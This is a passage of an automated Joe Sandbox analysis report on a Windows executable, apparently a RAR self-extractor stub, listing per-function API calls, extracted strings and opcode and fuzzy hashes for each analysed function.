                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcslen$_wcsrchr
                                                                                        • String ID: .exe$.rar$.sfx
                                                                                        • API String ID: 3513545583-31770016
                                                                                        • Opcode ID: 255ed14aba28fa9f6abd28a4019d216b0be9ff758ab633ca3d9bf819e58c145a
                                                                                        • Instruction ID: f53bdbbb0828b154a5d8168c9cb284c519b9219790794572d348b0018d496d65
                                                                                        • Opcode Fuzzy Hash: 255ed14aba28fa9f6abd28a4019d216b0be9ff758ab633ca3d9bf819e58c145a
                                                                                        • Instruction Fuzzy Hash: C7417A22560315D5CB33AF748812A7BB3A8EF42704F11E90EFCD6AF189EB648D81C395
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0036BB03 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 127COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _wcslen.LIBCMT ref: 0036BB27
                                                                                        • GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,0036A275,?,?,00000800,?,0036A23A,?,0036755C), ref: 0036BBC5
                                                                                        • _wcslen.LIBCMT ref: 0036BC3B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcslen$CurrentDirectory
                                                                                        • String ID: UNC$\\?\
                                                                                        • API String ID: 3341907918-253988292
                                                                                        • Opcode ID: 222c2e2fd026fe256d5bc87831745935413ace9d7e8eb2e73144506ae8ef160e
                                                                                        • Instruction ID: 6735344d2a343eaf59fdcd5fa15fca07410fc994f2c3070e3a82ccfde8cbf5e1
                                                                                        • Opcode Fuzzy Hash: 222c2e2fd026fe256d5bc87831745935413ace9d7e8eb2e73144506ae8ef160e
                                                                                        • Instruction Fuzzy Hash: A141807144021AA6CF23AF60CC41EEEBBADAF45390F11C466F858EB155EB74DAD08F60
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0037CD58 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 103COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _wcschr.LIBVCRUNTIME ref: 0037CD84
                                                                                          • Part of subcall function 0037AF98: _wcschr.LIBVCRUNTIME ref: 0037B033
                                                                                          • Part of subcall function 00371FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0036C116,00000000,.exe,?,?,00000800,?,?,?,00378E3C), ref: 00371FD1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcschr$CompareString
                                                                                        • String ID: <$HIDE$MAX$MIN
                                                                                        • API String ID: 69343711-3358265660
                                                                                        • Opcode ID: a63442ce706282dfa957e0077acdca1a305d792fcc2e744579f43b599574ff6d
                                                                                        • Instruction ID: 92502b3dccdba0436e7f5a49566d49f7586f568b6a0bfcc3705236e72029d8a6
                                                                                        • Opcode Fuzzy Hash: a63442ce706282dfa957e0077acdca1a305d792fcc2e744579f43b599574ff6d
                                                                                        • Instruction Fuzzy Hash: AD3173769006099ADF37DB64CC41AEE73BCAB15351F01C56AE509E7180EBB89E848FA1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0037AAC9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 77COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetDC.USER32(00000000), ref: 0037AAD2
                                                                                        • GetObjectW.GDI32(?,00000018,?), ref: 0037AB01
                                                                                        • ReleaseDC.USER32(00000000,?), ref: 0037AB99
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: ObjectRelease
                                                                                        • String ID: -7$77
                                                                                        • API String ID: 1429681911-1903741993
                                                                                        • Opcode ID: e9a28d38778e3459e8e98041ff15b2ef503305afd8fbebc4e3a716ca3f8b91df
                                                                                        • Instruction ID: ea53bf1250d3ec79fab6327fb7ed571e237db98eccecb7e37b4017c5efd6d953
                                                                                        • Opcode Fuzzy Hash: e9a28d38778e3459e8e98041ff15b2ef503305afd8fbebc4e3a716ca3f8b91df
                                                                                        • Instruction Fuzzy Hash: 3C21E7B2148314AFD302AFA5DC48E6FBBFDFF89351F044819FA46D2120D631AA548B62
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0036B991 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _swprintf.LIBCMT ref: 0036B9B8
                                                                                          • Part of subcall function 00364092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 003640A5
                                                                                        • _wcschr.LIBVCRUNTIME ref: 0036B9D6
                                                                                        • _wcschr.LIBVCRUNTIME ref: 0036B9E6
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcschr$__vswprintf_c_l_swprintf
                                                                                        • String ID: %c:\
                                                                                        • API String ID: 525462905-3142399695
                                                                                        • Opcode ID: cb2328ac369e33b2589c0490b847e92d86c4ba3085cf33766d49fe83e827490f
                                                                                        • Instruction ID: 9d58c613aa123bef1580ceffecf3f80cf3bb0a74bd8e7ea492f703a3d719e8dc
                                                                                        • Opcode Fuzzy Hash: cb2328ac369e33b2589c0490b847e92d86c4ba3085cf33766d49fe83e827490f
                                                                                        • Instruction Fuzzy Hash: E901F56350431169DA327B75CC46D6BE7ECEE92770B40C80AF544DA086EB20D880C7B1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0037B270 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 62COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00361316: GetDlgItem.USER32(00000000,00003021), ref: 0036135A
                                                                                          • Part of subcall function 00361316: SetWindowTextW.USER32(00000000,003935F4), ref: 00361370
                                                                                        • EndDialog.USER32(?,00000001), ref: 0037B2BE
                                                                                        • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 0037B2D6
                                                                                        • SetDlgItemTextW.USER32(?,00000067,?), ref: 0037B304
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: ItemText$DialogWindow
                                                                                        • String ID: GETPASSWORD1$xz;
                                                                                        • API String ID: 445417207-2733714143
                                                                                        • Opcode ID: c5e05b726ddd47977b9a4f4bc4087ea411143576ea19b401430dbe0486a190be
                                                                                        • Instruction ID: aaca5da2ead4615f1e82f3310eee6081177a73f72f05bc1357f94e1f6d03fa39
                                                                                        • Opcode Fuzzy Hash: c5e05b726ddd47977b9a4f4bc4087ea411143576ea19b401430dbe0486a190be
                                                                                        • Instruction Fuzzy Hash: C8110836900118BADB339A649C49FFFB77CEF09704F108420FA49F6580D7A8A9418771
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0037B6DD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LoadBitmapW.USER32(00000065), ref: 0037B6ED
                                                                                        • GetObjectW.GDI32(00000000,00000018,?), ref: 0037B712
                                                                                        • DeleteObject.GDI32(00000000), ref: 0037B744
                                                                                        • DeleteObject.GDI32(00000000), ref: 0037B767
                                                                                          • Part of subcall function 0037A6C2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,0037B73D,00000066), ref: 0037A6D5
                                                                                          • Part of subcall function 0037A6C2: SizeofResource.KERNEL32(00000000,?,?,?,0037B73D,00000066), ref: 0037A6EC
                                                                                          • Part of subcall function 0037A6C2: LoadResource.KERNEL32(00000000,?,?,?,0037B73D,00000066), ref: 0037A703
                                                                                          • Part of subcall function 0037A6C2: LockResource.KERNEL32(00000000,?,?,?,0037B73D,00000066), ref: 0037A712
                                                                                          • Part of subcall function 0037A6C2: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0037B73D,00000066), ref: 0037A72D
                                                                                          • Part of subcall function 0037A6C2: GlobalLock.KERNEL32(00000000,?,?,?,?,?,0037B73D,00000066), ref: 0037A73E
                                                                                          • Part of subcall function 0037A6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0037A7A7
                                                                                          • Part of subcall function 0037A6C2: GlobalUnlock.KERNEL32(00000000), ref: 0037A7C6
                                                                                          • Part of subcall function 0037A6C2: GlobalFree.KERNEL32(00000000), ref: 0037A7CD
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: GlobalResource$Object$BitmapDeleteLoadLock$AllocCreateFindFreeFromGdipSizeofUnlock
                                                                                        • String ID: ]
                                                                                        • API String ID: 1428510222-3352871620
                                                                                        • Opcode ID: 549f191ce5fb60ed2a9792c0ec0dbf2ca3a403bb7d018b1fd711f4e938ffda67
                                                                                        • Instruction ID: 7a7a3df8906a998b67ae55fb60b60262799672eaf4262e6c4021dd0291dd2517
                                                                                        • Opcode Fuzzy Hash: 549f191ce5fb60ed2a9792c0ec0dbf2ca3a403bb7d018b1fd711f4e938ffda67
                                                                                        • Instruction Fuzzy Hash: BD01D63650061567C73377745C09F7FBABE9FC1752F058015F948EB291DF298D055262
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0037D600 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00361316: GetDlgItem.USER32(00000000,00003021), ref: 0036135A
                                                                                          • Part of subcall function 00361316: SetWindowTextW.USER32(00000000,003935F4), ref: 00361370
                                                                                        • EndDialog.USER32(?,00000001), ref: 0037D64B
                                                                                        • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 0037D661
                                                                                        • SetDlgItemTextW.USER32(?,00000066,?), ref: 0037D675
                                                                                        • SetDlgItemTextW.USER32(?,00000068), ref: 0037D684
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: ItemText$DialogWindow
                                                                                        • String ID: RENAMEDLG
                                                                                        • API String ID: 445417207-3299779563
                                                                                        • Opcode ID: 77177dd0745cc5f97dce611145660a38449693f4d314a17bb79dc8fda1099f9a
                                                                                        • Instruction ID: 26f95472457fc859ab6fd3e617bdf89ba183339bd339c2489b084fa1ba18f480
                                                                                        • Opcode Fuzzy Hash: 77177dd0745cc5f97dce611145660a38449693f4d314a17bb79dc8fda1099f9a
                                                                                        • Instruction Fuzzy Hash: 21012833284214BED2335F649E09F577B7CEF5AB05F528110F30AA20D1C7A6AA04D775
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00387E73 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00387E24,?,?,00387DC4,?,0039C300,0000000C,00387F1B,?,00000002), ref: 00387E93
                                                                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00387EA6
                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,00387E24,?,?,00387DC4,?,0039C300,0000000C,00387F1B,?,00000002,00000000), ref: 00387EC9
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                                        • API String ID: 4061214504-1276376045
                                                                                        • Opcode ID: 51365cbb093e2d6a4a4e89ff9f7c4a8c6777e934877558b71a94cd9eaa35a1d2
                                                                                        • Instruction ID: 7eb14ccea3bca64735d86088b063b4e1905a37e659de7895792277ed6dd0a381
                                                                                        • Opcode Fuzzy Hash: 51365cbb093e2d6a4a4e89ff9f7c4a8c6777e934877558b71a94cd9eaa35a1d2
                                                                                        • Instruction Fuzzy Hash: 4FF06871905208BBDB139FA5DC09BDEBFB9EF44711F1140AAF805A2250DB369E40CB90
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0036F2C5 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 0037081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00370836
                                                                                          • Part of subcall function 0037081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0036F2D8,Crypt32.dll,00000000,0036F35C,?,?,0036F33E,?,?,?), ref: 00370858
                                                                                        • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0036F2E4
                                                                                        • GetProcAddress.KERNEL32(003A81C8,CryptUnprotectMemory), ref: 0036F2F4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc$DirectoryLibraryLoadSystem
                                                                                        • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                                                        • API String ID: 2141747552-1753850145
                                                                                        • Opcode ID: 5798e71cf246aca09ccf341690c944b8d0a4d6ae59af9e6bfda00cf2d240b91b
                                                                                        • Instruction ID: daa69d6c08429cdd73b4cd569cb064c86be681b67bea8b42274026684d3e31b0
                                                                                        • Opcode Fuzzy Hash: 5798e71cf246aca09ccf341690c944b8d0a4d6ae59af9e6bfda00cf2d240b91b
                                                                                        • Instruction Fuzzy Hash: 51E046B4950742AEDB239B38A849B82BAD86F04714F14C82EE0DAA3750DAB5D9808B50
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00382BDA Relevance: 7.7, APIs: 5, Instructions: 168COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: AdjustPointer$_abort
                                                                                        • String ID:
                                                                                        • API String ID: 2252061734-0
                                                                                        • Opcode ID: 4edecec2acea8cd81a133d5b938e566a24d282526b8370242dd9dac8237af72d
                                                                                        • Instruction ID: 3b66058a598dc26359ee8f061d45583c1248038ad394f034436094c91f550bdb
                                                                                        • Opcode Fuzzy Hash: 4edecec2acea8cd81a133d5b938e566a24d282526b8370242dd9dac8237af72d
                                                                                        • Instruction Fuzzy Hash: 5551CF71600312AFDB2BAF14D845BBBB7B4BF54310F2545AAEC124B6A1E731AD44D790
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0038BF30 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetEnvironmentStringsW.KERNEL32 ref: 0038BF39
                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0038BF5C
                                                                                          • Part of subcall function 00388E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,00384286,?,0000015D,?,?,?,?,00385762,000000FF,00000000,?,?), ref: 00388E38
                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0038BF82
                                                                                        • _free.LIBCMT ref: 0038BF95
                                                                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0038BFA4
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                        • String ID:
                                                                                        • API String ID: 336800556-0
                                                                                        • Opcode ID: 0eb4aaf83f7348e5acec297865699de0bbdf29a5c2a00933275ee3f58f2d9860
                                                                                        • Instruction ID: aa546c02a6206b82010c38a5808e7e187247a32b1a51df217a23ef8a7d333074
                                                                                        • Opcode Fuzzy Hash: 0eb4aaf83f7348e5acec297865699de0bbdf29a5c2a00933275ee3f58f2d9860
                                                                                        • Instruction Fuzzy Hash: D401D8B66013127F632336B65C8CC7BEB6DDEC2B903150199FA04C6211EF618D0186B0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00389869 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetLastError.KERNEL32(?,?,?,003891AD,0038B188,?,00389813,00000001,00000364,?,003840EF,?,?,003A1098), ref: 0038986E
                                                                                        • _free.LIBCMT ref: 003898A3
                                                                                        • _free.LIBCMT ref: 003898CA
                                                                                        • SetLastError.KERNEL32(00000000,?,003A1098), ref: 003898D7
                                                                                        • SetLastError.KERNEL32(00000000,?,003A1098), ref: 003898E0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$_free
                                                                                        • String ID:
                                                                                        • API String ID: 3170660625-0
                                                                                        • Opcode ID: 00a1050f19f7835118482262c96ba0370230881efb18dc7e2ca970cbf8d1e407
                                                                                        • Instruction ID: 5103ba57c9c7776e769bd194c278ddae35c715f96dda6e2da60edb2e5a95b2f0
                                                                                        • Opcode Fuzzy Hash: 00a1050f19f7835118482262c96ba0370230881efb18dc7e2ca970cbf8d1e407
                                                                                        • Instruction Fuzzy Hash: 8F01F4371447036BD31377646C85B7B256EDBD2770B3A05B7F515A6292EE318D029322
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00370EED Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 003711CF: ResetEvent.KERNEL32(?), ref: 003711E1
                                                                                          • Part of subcall function 003711CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 003711F5
                                                                                        • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00370F21
